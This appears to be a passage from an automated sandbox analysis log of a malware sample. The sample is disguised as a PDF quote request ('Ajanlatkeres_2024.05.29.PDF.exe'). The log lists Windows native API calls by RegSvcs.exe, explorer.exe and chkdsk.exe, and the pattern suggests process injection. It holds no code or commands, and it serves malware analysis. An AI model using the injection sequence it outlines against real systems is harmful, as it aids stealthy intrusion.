Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_0041A360 NtCreateFile,	19_2_0041A360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_0041A410 NtReadFile,	19_2_0041A410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_0041A490 NtClose,	19_2_0041A490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_0041A540 NtAllocateVirtualMemory,	19_2_0041A540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_0041A35D NtCreateFile,	19_2_0041A35D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_0041A3B2 NtCreateFile,	19_2_0041A3B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_0041A40A NtReadFile,	19_2_0041A40A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_0041A48A NtClose,	19_2_0041A48A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_0041A53A NtAllocateVirtualMemory,	19_2_0041A53A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F42AD0 NtReadFile,LdrInitializeThunk,	19_2_00F42AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F42BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	19_2_00F42BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F42B60 NtClose,LdrInitializeThunk,	19_2_00F42B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F42CA0 NtQueryInformationToken,LdrInitializeThunk,	19_2_00F42CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F42C70 NtFreeVirtualMemory,LdrInitializeThunk,	19_2_00F42C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F42DF0 NtQuerySystemInformation,LdrInitializeThunk,	19_2_00F42DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F42DD0 NtDelayExecution,LdrInitializeThunk,	19_2_00F42DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F42D30 NtUnmapViewOfSection,LdrInitializeThunk,	19_2_00F42D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F42D10 NtMapViewOfSection,LdrInitializeThunk,	19_2_00F42D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F42EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	19_2_00F42EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F42E80 NtReadVirtualMemory,LdrInitializeThunk,	19_2_00F42E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F42FE0 NtCreateFile,LdrInitializeThunk,	19_2_00F42FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F42FB0 NtResumeThread,LdrInitializeThunk,	19_2_00F42FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F42F90 NtProtectVirtualMemory,LdrInitializeThunk,	19_2_00F42F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F42F30 NtCreateSection,LdrInitializeThunk,	19_2_00F42F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F44340 NtSetContextThread,	19_2_00F44340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F44650 NtSuspendThread,	19_2_00F44650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F42AF0 NtWriteFile,	19_2_00F42AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F42AB0 NtWaitForSingleObject,	19_2_00F42AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F42BE0 NtQueryValueKey,	19_2_00F42BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F42BA0 NtEnumerateValueKey,	19_2_00F42BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F42B80 NtQueryInformationFile,	19_2_00F42B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F42CF0 NtOpenProcess,	19_2_00F42CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F42CC0 NtQueryVirtualMemory,	19_2_00F42CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F42C60 NtCreateKey,	19_2_00F42C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F42C00 NtQueryInformationProcess,	19_2_00F42C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F42DB0 NtEnumerateKey,	19_2_00F42DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F42D00 NtSetInformationFile,	19_2_00F42D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F42EE0 NtQueueApcThread,	19_2_00F42EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F42E30 NtWriteVirtualMemory,	19_2_00F42E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F42FA0 NtQuerySection,	19_2_00F42FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F42F60 NtCreateProcessEx,	19_2_00F42F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F43090 NtSetValueKey,	19_2_00F43090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F43010 NtOpenDirectoryObject,	19_2_00F43010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F435C0 NtCreateMutant,	19_2_00F435C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F439B0 NtGetContextThread,	19_2_00F439B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F43D70 NtOpenThread,	19_2_00F43D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F43D10 NtOpenProcessToken,	19_2_00F43D10
Source: C:\Windows\explorer.exe	Code function: 20_2_101E2E12 NtProtectVirtualMemory,	20_2_101E2E12
Source: C:\Windows\explorer.exe	Code function: 20_2_101E1232 NtCreateFile,	20_2_101E1232
Source: C:\Windows\explorer.exe	Code function: 20_2_101E2E0A NtProtectVirtualMemory,	20_2_101E2E0A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054C2D10 NtMapViewOfSection,LdrInitializeThunk,	21_2_054C2D10
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054C2DD0 NtDelayExecution,LdrInitializeThunk,	21_2_054C2DD0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054C2DF0 NtQuerySystemInformation,LdrInitializeThunk,	21_2_054C2DF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054C2C60 NtCreateKey,LdrInitializeThunk,	21_2_054C2C60
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054C2C70 NtFreeVirtualMemory,LdrInitializeThunk,	21_2_054C2C70
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054C2CA0 NtQueryInformationToken,LdrInitializeThunk,	21_2_054C2CA0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054C2F30 NtCreateSection,LdrInitializeThunk,	21_2_054C2F30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054C2FE0 NtCreateFile,LdrInitializeThunk,	21_2_054C2FE0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054C2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	21_2_054C2EA0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054C2B60 NtClose,LdrInitializeThunk,	21_2_054C2B60
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054C2BE0 NtQueryValueKey,LdrInitializeThunk,	21_2_054C2BE0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	21_2_054C2BF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054C35C0 NtCreateMutant,LdrInitializeThunk,	21_2_054C35C0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054C4650 NtSuspendThread,	21_2_054C4650
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054C4340 NtSetContextThread,	21_2_054C4340
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054C2D00 NtSetInformationFile,	21_2_054C2D00
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054C2D30 NtUnmapViewOfSection,	21_2_054C2D30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054C2DB0 NtEnumerateKey,	21_2_054C2DB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054C2C00 NtQueryInformationProcess,	21_2_054C2C00
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054C2CC0 NtQueryVirtualMemory,	21_2_054C2CC0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054C2CF0 NtOpenProcess,	21_2_054C2CF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054C2F60 NtCreateProcessEx,	21_2_054C2F60
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054C2F90 NtProtectVirtualMemory,	21_2_054C2F90
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054C2FA0 NtQuerySection,	21_2_054C2FA0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054C2FB0 NtResumeThread,	21_2_054C2FB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054C2E30 NtWriteVirtualMemory,	21_2_054C2E30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054C2EE0 NtQueueApcThread,	21_2_054C2EE0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054C2E80 NtReadVirtualMemory,	21_2_054C2E80
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054C2B80 NtQueryInformationFile,	21_2_054C2B80
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054C2BA0 NtEnumerateValueKey,	21_2_054C2BA0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054C2AD0 NtReadFile,	21_2_054C2AD0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054C2AF0 NtWriteFile,	21_2_054C2AF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054C2AB0 NtWaitForSingleObject,	21_2_054C2AB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054C3010 NtOpenDirectoryObject,	21_2_054C3010
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054C3090 NtSetValueKey,	21_2_054C3090
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054C3D70 NtOpenThread,	21_2_054C3D70
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054C3D10 NtOpenProcessToken,	21_2_054C3D10
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054C39B0 NtGetContextThread,	21_2_054C39B0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_00A4A360 NtCreateFile,	21_2_00A4A360
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_00A4A490 NtClose,	21_2_00A4A490
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_00A4A410 NtReadFile,	21_2_00A4A410
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_00A4A540 NtAllocateVirtualMemory,	21_2_00A4A540
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_00A4A3B2 NtCreateFile,	21_2_00A4A3B2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_00A4A35D NtCreateFile,	21_2_00A4A35D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_00A4A48A NtClose,	21_2_00A4A48A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_00A4A40A NtReadFile,	21_2_00A4A40A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_00A4A53A NtAllocateVirtualMemory,	21_2_00A4A53A

Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Code function: 6_2_0136D304	6_2_0136D304
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Code function: 6_2_07294450	6_2_07294450
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Code function: 6_2_072964C0	6_2_072964C0
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Code function: 6_2_0729CFF0	6_2_0729CFF0
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Code function: 6_2_07294CC0	6_2_07294CC0
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Code function: 6_2_07294888	6_2_07294888
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Code function: 6_2_072968F8	6_2_072968F8
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Code function: 14_2_0161D304	14_2_0161D304
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Code function: 14_2_05576F40	14_2_05576F40
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Code function: 14_2_05570040	14_2_05570040
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Code function: 14_2_05570006	14_2_05570006
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Code function: 14_2_05576F1E	14_2_05576F1E
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Code function: 14_2_055AD070	14_2_055AD070
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Code function: 14_2_055AC578	14_2_055AC578
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Code function: 14_2_055AC568	14_2_055AC568
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Code function: 14_2_055AC518	14_2_055AC518
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Code function: 14_2_055AD060	14_2_055AD060
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Code function: 14_2_055ABF78	14_2_055ABF78
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Code function: 14_2_055ABF6B	14_2_055ABF6B
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Code function: 14_2_077B6EC8	14_2_077B6EC8
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Code function: 14_2_077B6EB7	14_2_077B6EB7
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Code function: 14_2_077B6518	14_2_077B6518
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Code function: 14_2_077B4D10	14_2_077B4D10
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Code function: 14_2_077B4D00	14_2_077B4D00
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Code function: 14_2_077B6507	14_2_077B6507
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Code function: 14_2_077BBCB0	14_2_077BBCB0
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Code function: 14_2_077B44A0	14_2_077B44A0
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Code function: 14_2_077B449D	14_2_077B449D
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Code function: 14_2_077B0934	14_2_077B0934
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Code function: 14_2_077B11B1	14_2_077B11B1
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Code function: 14_2_077B48D8	14_2_077B48D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0040549C	15_2_0040549C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_004029D4	15_2_004029D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00401030	19_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_0041F030	19_2_0041F030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_0041EB3B	19_2_0041EB3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_0041DBBA	19_2_0041DBBA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_0041E56B	19_2_0041E56B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00402D90	19_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00409E60	19_2_00409E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_0041D684	19_2_0041D684
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_0041EEAC	19_2_0041EEAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00402FB0	19_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FA2000	19_2_00FA2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FC81CC	19_2_00FC81CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FD01AA	19_2_00FD01AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FC41A2	19_2_00FC41A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F98158	19_2_00F98158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FAA118	19_2_00FAA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F00100	19_2_00F00100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F902C0	19_2_00F902C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FB0274	19_2_00FB0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F1E3F0	19_2_00F1E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FD03E6	19_2_00FD03E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FCA352	19_2_00FCA352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FBE4F6	19_2_00FBE4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FC2446	19_2_00FC2446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FB4420	19_2_00FB4420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FD0591	19_2_00FD0591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F10535	19_2_00F10535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F2C6E0	19_2_00F2C6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F0C7C0	19_2_00F0C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F10770	19_2_00F10770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F34750	19_2_00F34750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3E8F0	19_2_00F3E8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00EF68B8	19_2_00EF68B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F1A840	19_2_00F1A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F12840	19_2_00F12840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F129A0	19_2_00F129A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FDA9A6	19_2_00FDA9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F26962	19_2_00F26962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F0EA80	19_2_00F0EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FC6BD7	19_2_00FC6BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FCAB40	19_2_00FCAB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F00CF2	19_2_00F00CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FB0CB5	19_2_00FB0CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F10C00	19_2_00F10C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F0ADE0	19_2_00F0ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F28DBF	19_2_00F28DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FACD1F	19_2_00FACD1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F1AD00	19_2_00F1AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FCEEDB	19_2_00FCEEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F22E90	19_2_00F22E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FCCE93	19_2_00FCCE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F10E59	19_2_00F10E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FCEE26	19_2_00FCEE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F1CFE0	19_2_00F1CFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F02FC8	19_2_00F02FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F8EFA0	19_2_00F8EFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F84F40	19_2_00F84F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F30F30	19_2_00F30F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FB2F30	19_2_00FB2F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F52F28	19_2_00F52F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FC70E9	19_2_00FC70E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FCF0E0	19_2_00FCF0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F170C0	19_2_00F170C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FBF0CC	19_2_00FBF0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F1B1B0	19_2_00F1B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FDB16B	19_2_00FDB16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F4516C	19_2_00F4516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00EFF172	19_2_00EFF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FB12ED	19_2_00FB12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F2B2C0	19_2_00F2B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F152A0	19_2_00F152A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F5739A	19_2_00F5739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00EFD34C	19_2_00EFD34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FC132D	19_2_00FC132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F01460	19_2_00F01460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FCF43F	19_2_00FCF43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FD95C3	19_2_00FD95C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FAD5B0	19_2_00FAD5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FC7571	19_2_00FC7571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FC16CC	19_2_00FC16CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F55630	19_2_00F55630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FCF7B0	19_2_00FCF7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F138E0	19_2_00F138E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F7D800	19_2_00F7D800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F19950	19_2_00F19950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F2B950	19_2_00F2B950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FA5910	19_2_00FA5910
